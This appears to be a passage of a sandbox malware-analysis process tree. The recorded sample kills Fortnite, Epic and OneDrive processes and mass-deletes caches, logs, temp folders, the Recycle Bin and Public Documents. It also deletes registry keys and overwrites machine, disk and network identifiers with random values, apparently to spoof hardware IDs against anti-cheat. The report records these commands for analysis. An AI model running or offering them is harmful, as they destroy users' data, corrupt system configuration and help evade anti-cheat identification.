      Suspicious use of SetWindowsHookEx
      PID:2528
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2528 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1776
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:616
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:3048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1764
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2260
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
    PID:2548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2728
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:3020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2316
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2100
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2600
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:1364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:1068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:2268
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:1588
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:2088
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2072
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:2916
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:3020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:900
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:1172
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:1292
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:3000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:2108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:1676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:1136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:1540
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\system_no_output32\config\system_no_outputprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:1660
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1668
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /s /f /a:h /a:a /d C:\MSOCache\{71230000_00E2-0000-1000-00000000}\Setup.dat
    3⤵
    PID:2224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:1480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:1764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:2612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:1736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:2328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:3012
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:1296
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:2316
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 241823195010781284226521258981612122262203637212478724521 /f
      4⤵
      PID:832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\system_no_output Volume Information\IndexerVolumeGuid
    3⤵
    PID:2768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:1032
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      PID:1916
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:1108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:2896
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 241823195010781284226521258981612122262203637212478724521 /f
      4⤵
      PID:1476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:1440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:992
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-24182 /f
      4⤵
      PID:204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2492
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-24182 /f
      4⤵
      PID:1536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Windows\system_no_output32\restore\MachineGuid.txt
    3⤵
    PID:2880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:2288
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 24182-31950-10781-2842 /f
      4⤵
      Modifies registry key
      PID:2576
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:1416
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {%random%-%random} /f
    3⤵
    PID:2544
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {24182-%random} /f
      4⤵
      PID:1164
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:1608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:2408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d 241823195010781 /f
      4⤵
      PID:892
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:1752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random% /f
    3⤵
    PID:2876
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 24182 /f
      4⤵
      PID:2728
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:2608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 24182 /f
      4⤵
      PID:764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:2168
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d 24185993128645 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:2548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:2988
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {24185-9931-2864526905} /f
      4⤵
      PID:2328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:2504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:2556
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {24185-9931-2864526905} /f
      4⤵
      Modifies registry key
      PID:2964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:1292
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {24185-9931-2864526905} /f
      4⤵
      Modifies registry key
      PID:3004
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:2080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:772
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      PID:1756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:2360
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:916
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      PID:2632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2096
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      PID:2868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:2888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1792
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      Modifies registry key
      PID:2440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:1584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:1540
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      PID:1960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:2640
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1376
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      Enumerates system info in registry
      PID:3048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:2128
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 24185-9931-2864526905 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:2092
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\RHKRUA8J
    3⤵
    PID:2408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:1588
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {24185-9931-2864526905} /f
      4⤵
      PID:2072
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:2720
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:2916
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {24185-9931-2864526905} /f
      4⤵
      PID:2168
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:2740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2452
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-24185 /f
      4⤵
      Modifies registry key
      PID:2284
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:3020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:1296
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 24185 /f
      4⤵
      PID:1996
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rd /q /s C:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:2768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:3004
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 24185 /f
      4⤵
      Modifies registry key
      PID:2784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:1108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2008
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-24188 /f
      4⤵
      PID:1548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2632
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {24188-20679-13741-1820014382} /f
      4⤵
      Modifies registry key
      PID:396
- - C:\Windows\System32\cmd.exe
